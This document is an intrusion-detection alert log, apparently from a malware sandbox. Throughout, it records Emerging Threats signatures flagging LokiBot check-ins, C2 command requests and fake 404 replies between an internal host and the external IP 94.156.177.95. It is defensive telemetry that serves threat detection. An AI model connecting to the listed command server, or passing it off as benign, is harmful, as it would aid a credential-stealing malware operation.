2024-11-15T18:15:10.714557+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49825	94.156.177.95	80	TCP
2024-11-15T18:15:10.720089+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49825	TCP
2024-11-15T18:15:10.869167+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49832	94.156.177.95	80	TCP
2024-11-15T18:15:10.869167+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49832	94.156.177.95	80	TCP
2024-11-15T18:15:10.869167+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49832	94.156.177.95	80	TCP
2024-11-15T18:15:11.839294+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49832	94.156.177.95	80	TCP
2024-11-15T18:15:11.839294+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49832	94.156.177.95	80	TCP
2024-11-15T18:15:11.845061+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49832	TCP
2024-11-15T18:15:12.002434+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49836	94.156.177.95	80	TCP
2024-11-15T18:15:12.002434+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49836	94.156.177.95	80	TCP
2024-11-15T18:15:12.002434+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49836	94.156.177.95	80	TCP
2024-11-15T18:15:12.948556+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49836	94.156.177.95	80	TCP
2024-11-15T18:15:12.948556+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49836	94.156.177.95	80	TCP
2024-11-15T18:15:12.953797+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49836	TCP
2024-11-15T18:15:13.104632+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49841	94.156.177.95	80	TCP
2024-11-15T18:15:13.104632+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49841	94.156.177.95	80	TCP
2024-11-15T18:15:13.104632+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49841	94.156.177.95	80	TCP
2024-11-15T18:15:14.079858+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49841	94.156.177.95	80	TCP
2024-11-15T18:15:14.079858+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49841	94.156.177.95	80	TCP
2024-11-15T18:15:14.085123+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49841	TCP
2024-11-15T18:15:14.236003+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49849	94.156.177.95	80	TCP
2024-11-15T18:15:14.236003+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49849	94.156.177.95	80	TCP
2024-11-15T18:15:14.236003+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49849	94.156.177.95	80	TCP
2024-11-15T18:15:15.183719+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49849	94.156.177.95	80	TCP
2024-11-15T18:15:15.183719+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49849	94.156.177.95	80	TCP
2024-11-15T18:15:15.188874+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49849	TCP
2024-11-15T18:15:15.349391+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49855	94.156.177.95	80	TCP
2024-11-15T18:15:15.349391+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49855	94.156.177.95	80	TCP
2024-11-15T18:15:15.349391+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49855	94.156.177.95	80	TCP
2024-11-15T18:15:16.283700+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49855	94.156.177.95	80	TCP
2024-11-15T18:15:16.283700+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49855	94.156.177.95	80	TCP
2024-11-15T18:15:16.288998+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49855	TCP
2024-11-15T18:15:16.433713+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49860	94.156.177.95	80	TCP
2024-11-15T18:15:16.433713+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49860	94.156.177.95	80	TCP
2024-11-15T18:15:16.433713+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49860	94.156.177.95	80	TCP
2024-11-15T18:15:17.363462+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49860	94.156.177.95	80	TCP
2024-11-15T18:15:17.363462+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49860	94.156.177.95	80	TCP
2024-11-15T18:15:17.368827+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49860	TCP
2024-11-15T18:15:17.538066+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49865	94.156.177.95	80	TCP
2024-11-15T18:15:17.538066+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49865	94.156.177.95	80	TCP
2024-11-15T18:15:17.538066+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49865	94.156.177.95	80	TCP
2024-11-15T18:15:18.468562+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49865	94.156.177.95	80	TCP
2024-11-15T18:15:18.468562+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49865	94.156.177.95	80	TCP
2024-11-15T18:15:18.474007+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49865	TCP
2024-11-15T18:15:18.633126+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49869	94.156.177.95	80	TCP
2024-11-15T18:15:18.633126+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49869	94.156.177.95	80	TCP
2024-11-15T18:15:18.633126+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49869	94.156.177.95	80	TCP
2024-11-15T18:15:19.607161+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49869	94.156.177.95	80	TCP
2024-11-15T18:15:19.607161+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49869	94.156.177.95	80	TCP
2024-11-15T18:15:19.612495+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49869	TCP
2024-11-15T18:15:19.765315+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49875	94.156.177.95	80	TCP
2024-11-15T18:15:19.765315+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49875	94.156.177.95	80	TCP
2024-11-15T18:15:19.765315+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49875	94.156.177.95	80	TCP
2024-11-15T18:15:20.770567+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49875	94.156.177.95	80	TCP
2024-11-15T18:15:20.770567+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49875	94.156.177.95	80	TCP
2024-11-15T18:15:20.775939+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49875	TCP
2024-11-15T18:15:20.938967+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49879	94.156.177.95	80	TCP
2024-11-15T18:15:20.938967+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49879	94.156.177.95	80	TCP
2024-11-15T18:15:20.938967+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49879	94.156.177.95	80	TCP
2024-11-15T18:15:21.914705+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49879	94.156.177.95	80	TCP
2024-11-15T18:15:21.914705+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49879	94.156.177.95	80	TCP
2024-11-15T18:15:21.920075+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49879	TCP
2024-11-15T18:15:22.075165+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49884	94.156.177.95	80	TCP
2024-11-15T18:15:22.075165+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49884	94.156.177.95	80	TCP
2024-11-15T18:15:22.075165+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49884	94.156.177.95	80	TCP
2024-11-15T18:15:23.029911+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49884	94.156.177.95	80	TCP
2024-11-15T18:15:23.029911+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49884	94.156.177.95	80	TCP
2024-11-15T18:15:23.035295+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49884	TCP
2024-11-15T18:15:23.183308+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49888	94.156.177.95	80	TCP
2024-11-15T18:15:23.183308+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49888	94.156.177.95	80	TCP
2024-11-15T18:15:23.183308+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49888	94.156.177.95	80	TCP
2024-11-15T18:15:24.551139+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49888	94.156.177.95	80	TCP
2024-11-15T18:15:24.551139+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49888	94.156.177.95	80	TCP
2024-11-15T18:15:24.556825+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49888	TCP
2024-11-15T18:15:24.806146+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49895	94.156.177.95	80	TCP
2024-11-15T18:15:24.806146+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49895	94.156.177.95	80	TCP
2024-11-15T18:15:24.806146+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49895	94.156.177.95	80	TCP
2024-11-15T18:15:25.761835+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49895	94.156.177.95	80	TCP
2024-11-15T18:15:25.761835+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49895	94.156.177.95	80	TCP
2024-11-15T18:15:25.767137+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49895	TCP
2024-11-15T18:15:26.050868+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49900	94.156.177.95	80	TCP
2024-11-15T18:15:26.050868+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49900	94.156.177.95	80	TCP
2024-11-15T18:15:26.050868+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49900	94.156.177.95	80	TCP
2024-11-15T18:15:27.028960+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49900	94.156.177.95	80	TCP
2024-11-15T18:15:27.028960+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49900	94.156.177.95	80	TCP
2024-11-15T18:15:27.034568+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49900	TCP
2024-11-15T18:15:27.207351+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49905	94.156.177.95	80	TCP
2024-11-15T18:15:27.207351+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49905	94.156.177.95	80	TCP
2024-11-15T18:15:27.207351+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49905	94.156.177.95	80	TCP
2024-11-15T18:15:28.161346+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49905	94.156.177.95	80	TCP
2024-11-15T18:15:28.161346+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49905	94.156.177.95	80	TCP
2024-11-15T18:15:28.166501+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49905	TCP
2024-11-15T18:15:28.328661+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49911	94.156.177.95	80	TCP
2024-11-15T18:15:28.328661+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49911	94.156.177.95	80	TCP
2024-11-15T18:15:28.328661+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49911	94.156.177.95	80	TCP
2024-11-15T18:15:29.273083+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49911	94.156.177.95	80	TCP
2024-11-15T18:15:29.273083+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49911	94.156.177.95	80	TCP
2024-11-15T18:15:29.278462+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49911	TCP
2024-11-15T18:15:29.444036+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49918	94.156.177.95	80	TCP
2024-11-15T18:15:29.444036+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49918	94.156.177.95	80	TCP
2024-11-15T18:15:29.444036+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49918	94.156.177.95	80	TCP
2024-11-15T18:15:30.400380+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49918	94.156.177.95	80	TCP
2024-11-15T18:15:30.400380+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49918	94.156.177.95	80	TCP
2024-11-15T18:15:30.406277+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49918	TCP
2024-11-15T18:15:30.558346+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49923	94.156.177.95	80	TCP
2024-11-15T18:15:30.558346+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49923	94.156.177.95	80	TCP
2024-11-15T18:15:30.558346+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49923	94.156.177.95	80	TCP
2024-11-15T18:15:32.028611+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49923	94.156.177.95	80	TCP
2024-11-15T18:15:32.028611+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49923	94.156.177.95	80	TCP
2024-11-15T18:15:32.033879+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49923	TCP
2024-11-15T18:15:32.185276+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49932	94.156.177.95	80	TCP
2024-11-15T18:15:32.185276+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49932	94.156.177.95	80	TCP
2024-11-15T18:15:32.185276+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49932	94.156.177.95	80	TCP
2024-11-15T18:15:33.186723+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49932	94.156.177.95	80	TCP
2024-11-15T18:15:33.186723+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49932	94.156.177.95	80	TCP
2024-11-15T18:15:33.192062+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49932	TCP
2024-11-15T18:15:33.342990+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49936	94.156.177.95	80	TCP
2024-11-15T18:15:33.342990+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49936	94.156.177.95	80	TCP
2024-11-15T18:15:33.342990+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49936	94.156.177.95	80	TCP
2024-11-15T18:15:34.312997+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49936	94.156.177.95	80	TCP
2024-11-15T18:15:34.312997+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49936	94.156.177.95	80	TCP
2024-11-15T18:15:34.318229+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49936	TCP
2024-11-15T18:15:34.461022+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49942	94.156.177.95	80	TCP
2024-11-15T18:15:34.461022+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49942	94.156.177.95	80	TCP
2024-11-15T18:15:34.461022+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49942	94.156.177.95	80	TCP
2024-11-15T18:15:35.454641+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49942	94.156.177.95	80	TCP
2024-11-15T18:15:35.454641+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49942	94.156.177.95	80	TCP
2024-11-15T18:15:35.460048+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49942	TCP
2024-11-15T18:15:35.606842+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49949	94.156.177.95	80	TCP
2024-11-15T18:15:35.606842+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49949	94.156.177.95	80	TCP
2024-11-15T18:15:35.606842+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49949	94.156.177.95	80	TCP
2024-11-15T18:15:36.557201+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49949	94.156.177.95	80	TCP
2024-11-15T18:15:36.557201+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49949	94.156.177.95	80	TCP
2024-11-15T18:15:36.562590+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49949	TCP
2024-11-15T18:15:36.942827+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49956	94.156.177.95	80	TCP
2024-11-15T18:15:36.942827+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49956	94.156.177.95	80	TCP
2024-11-15T18:15:36.942827+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49956	94.156.177.95	80	TCP
2024-11-15T18:15:37.893726+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49956	94.156.177.95	80	TCP
2024-11-15T18:15:37.893726+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49956	94.156.177.95	80	TCP
2024-11-15T18:15:37.899107+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49956	TCP
2024-11-15T18:15:38.040556+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49965	94.156.177.95	80	TCP
2024-11-15T18:15:38.040556+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49965	94.156.177.95	80	TCP
2024-11-15T18:15:38.040556+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49965	94.156.177.95	80	TCP
2024-11-15T18:15:39.002081+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49965	94.156.177.95	80	TCP
2024-11-15T18:15:39.002081+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49965	94.156.177.95	80	TCP
2024-11-15T18:15:39.007797+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49965	TCP
2024-11-15T18:15:39.160355+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49971	94.156.177.95	80	TCP
2024-11-15T18:15:39.160355+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49971	94.156.177.95	80	TCP
2024-11-15T18:15:39.160355+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49971	94.156.177.95	80	TCP
2024-11-15T18:15:40.095784+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49971	94.156.177.95	80	TCP
2024-11-15T18:15:40.095784+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49971	94.156.177.95	80	TCP
2024-11-15T18:15:40.101074+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49971	TCP
2024-11-15T18:15:40.257744+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49978	94.156.177.95	80	TCP
2024-11-15T18:15:40.257744+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49978	94.156.177.95	80	TCP
2024-11-15T18:15:40.257744+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49978	94.156.177.95	80	TCP
2024-11-15T18:15:41.246344+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49978	94.156.177.95	80	TCP
2024-11-15T18:15:41.246344+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49978	94.156.177.95	80	TCP
2024-11-15T18:15:41.252279+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49978	TCP
2024-11-15T18:15:41.402378+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49985	94.156.177.95	80	TCP
2024-11-15T18:15:41.402378+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49985	94.156.177.95	80	TCP
2024-11-15T18:15:41.402378+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49985	94.156.177.95	80	TCP
2024-11-15T18:15:42.358174+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49985	94.156.177.95	80	TCP
2024-11-15T18:15:42.358174+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49985	94.156.177.95	80	TCP
2024-11-15T18:15:42.363349+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49985	TCP
2024-11-15T18:15:42.524040+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49991	94.156.177.95	80	TCP
2024-11-15T18:15:42.524040+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49991	94.156.177.95	80	TCP
2024-11-15T18:15:42.524040+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49991	94.156.177.95	80	TCP
2024-11-15T18:15:43.496054+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49991	94.156.177.95	80	TCP
2024-11-15T18:15:43.496054+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49991	94.156.177.95	80	TCP
2024-11-15T18:15:43.501298+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49991	TCP
2024-11-15T18:15:43.648109+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49998	94.156.177.95	80	TCP
2024-11-15T18:15:43.648109+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49998	94.156.177.95	80	TCP
2024-11-15T18:15:43.648109+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49998	94.156.177.95	80	TCP
2024-11-15T18:15:44.609401+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49998	94.156.177.95	80	TCP
2024-11-15T18:15:44.609401+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49998	94.156.177.95	80	TCP
2024-11-15T18:15:44.614598+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	49998	TCP
2024-11-15T18:15:44.761342+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50003	94.156.177.95	80	TCP
2024-11-15T18:15:44.761342+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50003	94.156.177.95	80	TCP
2024-11-15T18:15:44.761342+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50003	94.156.177.95	80	TCP
2024-11-15T18:15:45.720877+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50003	94.156.177.95	80	TCP
2024-11-15T18:15:45.720877+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50003	94.156.177.95	80	TCP
2024-11-15T18:15:45.725988+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	50003	TCP
2024-11-15T18:15:45.883899+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50010	94.156.177.95	80	TCP
2024-11-15T18:15:45.883899+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50010	94.156.177.95	80	TCP
2024-11-15T18:15:45.883899+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50010	94.156.177.95	80	TCP
2024-11-15T18:15:47.222539+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50010	94.156.177.95	80	TCP
2024-11-15T18:15:47.222539+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50010	94.156.177.95	80	TCP
2024-11-15T18:15:47.228182+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	50010	TCP
2024-11-15T18:15:47.367955+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50016	94.156.177.95	80	TCP
2024-11-15T18:15:47.367955+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50016	94.156.177.95	80	TCP
2024-11-15T18:15:47.367955+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50016	94.156.177.95	80	TCP
2024-11-15T18:15:48.320341+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50016	94.156.177.95	80	TCP
2024-11-15T18:15:48.320341+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50016	94.156.177.95	80	TCP
2024-11-15T18:15:48.325705+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	50016	TCP
2024-11-15T18:15:48.523172+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50021	94.156.177.95	80	TCP
2024-11-15T18:15:48.523172+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50021	94.156.177.95	80	TCP
2024-11-15T18:15:48.523172+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50021	94.156.177.95	80	TCP
2024-11-15T18:15:49.484132+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50021	94.156.177.95	80	TCP
2024-11-15T18:15:49.484132+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50021	94.156.177.95	80	TCP
2024-11-15T18:15:49.489769+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.4	50021	TCP
2024-11-15T18:15:49.631500+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50026	94.156.177.95	80	TCP
2024-11-15T18:15:49.631500+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50026	94.156.177.95	80	TCP
2024-11-15T18:15:49.631500+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50026	94.156.177.95	80	TCP
